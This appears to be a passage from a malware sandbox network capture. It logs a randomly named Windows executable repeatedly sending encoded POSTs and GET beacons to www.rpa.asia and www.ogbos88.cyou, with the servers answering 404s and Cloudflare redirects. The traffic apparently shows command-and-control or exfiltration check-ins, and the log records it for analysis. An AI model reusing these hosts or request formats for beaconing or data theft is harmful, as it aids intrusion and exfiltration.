                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:28.531197071 CET  200                IN         Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    22          192.168.11.30  49846        160.25.166.123  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:55:31.089350939 CET  807                OUT        POST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 33 39 57 2f 6c 49 64 2f 76 36 62 68 50 55 6f 63 66 6d 39 49 3d
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIM39W/lId/v6bhPUocfm9I=
                                                                                    Jan 9, 2025 16:55:31.447804928 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:31 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:31.447814941 CET  200                IN         Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    23          192.168.11.30  49847        160.25.166.123  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:55:33.979420900 CET  3924               OUT        POST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 67 70 58 43 6b 4e 4d 75 68 38 44 77 67 72 48 74 72 47 49 4e 50 47 6f 32 4f 2b 33 79 71 48 31 38 45 30 36 6c 68 75 52 61 6c 52 32 58 49 70 30 75 34 7a 50 6b 43 76 76 39 78 4c 63 46 34 77 6e 6b 42 75 6a 4d 38 64 6c 69 41 61 63 4a 6b 59 72 71 6a 52 36 73 65 6a 79 72 78 65 38 61 39 6c 38 30 33 6c 38 32 62 2b 47 65 70 77 4c 36 4e 49 66 41 53 50 69 44 6a 78 6b 6b 31 54 4e 52 34 4f 62 6a 45 74 59 69 68 31 31 37 37 57 43 62 2b 56 6f 33 71 52 46 66 53 39 5a 66 65 78 67 56 32 41 30 72 61 33 55 43 68 46 59 51 35 64 38 78 33 6c 75 38 6f 55 61 6c 53 58 64 50 63 53 2b 6c 76 6c 6f 41 59 7a 6e [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=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 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:34.328692913 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:34 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:34.328737020 CET  200                IN         Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    24          192.168.11.30  49848        160.25.166.123  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:55:36.868823051 CET  531                OUT        GET /bwjl/?6B-l7F=DlXUXSIcZnIsgzlziINoOaBHIWRz+kGepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v1ALJkcTW8WFFCOZqPs=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:37.220998049 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:37 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:37.221043110 CET  200                IN         Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                    Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    25          192.168.11.30  49849        172.67.132.227  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:55:42.542651892 CET  799                OUT        POST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 42 4d 77 73 35 6d 77 32 4b 69 5a 37 62 45 42 6a 78 4a 4e 76 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZBMws5mw2KiZ7bEBjxJNvQ==
                                                                                    Jan 9, 2025 16:55:42.695679903 CET  800                IN         HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:42 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:42 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2KfUyvrYwELNR1kT60VeD1eP1O0YiGTZL58yfIZ3Az8f4e6MdeBqrh6w3vKAcXfgxJX8vC9vKQh89apecGX8xnZg44ezvn69WtzKuVFT1XoYW%2BRWwG5JP9d64ZX4iYmfbYCA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59cf74907e248-ORD
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    26          192.168.11.30  49850        172.67.132.227  80                5384  C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                           Bytes transferred  Direction  Data
                                                                                    Jan 9, 2025 16:55:45.201143026 CET  819                OUT        POST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3eG1/0SLGHKg9+xLdFd7k=
                                                                                    Jan 9, 2025 16:55:45.402821064 CET | 800               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:45 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:45 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DW9aceb4%2BrpOeoKIEL26iLQmzZoAIuK5Bms8XOXuKG81xAy08fjgx0IjZi2Zv4BI6kX3RaqwUBYfPSdsTGeeP2Zrl72YFa3Jpai38Yt2dDaoBC4C5ZEq9tLXgyDJextBMZhx"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59d07ebd210bb-ORD
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                    27         | 192.168.11.30 | 49851       | 172.67.132.227 | 80               | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                          | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:47.856874943 CET | 1289              | OUT       | POST /kj1o/ HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.ogbos88.cyou
                                                                                    Referer: http://www.ogbos88.cyou/kj1o/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=[TRUNCATED]
                                                                                    Jan 9, 2025 16:55:47.856925011 CET | 2647              | OUT       |
                                                                                    Data Ascii: 9jIwwFFRuMq/GqQL3/uTBEKjHmbgrmG/PCGq602Cc7JgGzP2kL8xOA2b3H/0kzGRELwUE0SAYINvpA13Un9dksgP70+cdjAva0fqPzQUI+VC/J2QeWGrOllVfV563WZ8vKq8O02KBVU6Gxuf4513UfHdp2xJu+CjimJ8bshOkFkRkZEv/XXiij/WHBedO2MQpqykIDMwvmO3p9cKuleFHbtts8uVny+f4FGvUSOgAtWOngYc0ki
                                                                                    Jan 9, 2025 16:55:47.994868040 CET | 810               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:47 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:47 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ewfl4ORWwRW7Rg1MJHG48ei6sQ152y1%2B32GgmIEeK%2Bah3MRFNeeCxfTi6HlYxFrJ70UTkjYLvcUZT131yQl9BoL3hNo%2FOE02Q2%2BhJgTd%2FHGsm9Kk6u8uwgretzGgmO%2FgmOzW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59d1888ed1407-ORD
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                    28         | 192.168.11.30 | 49852       | 172.67.132.227 | 80               | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                          | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:50.507252932 CET | 535               | OUT       | GET /kj1o/?80k=lRapCPMXgDk&6B-l7F=aFAzn/LT2mOAaNQADN8poQDHC/ShywB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQsmt/Lr8OGOl6Yl/nOLw= HTTP/1.1
                                                                                    Host: www.ogbos88.cyou
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
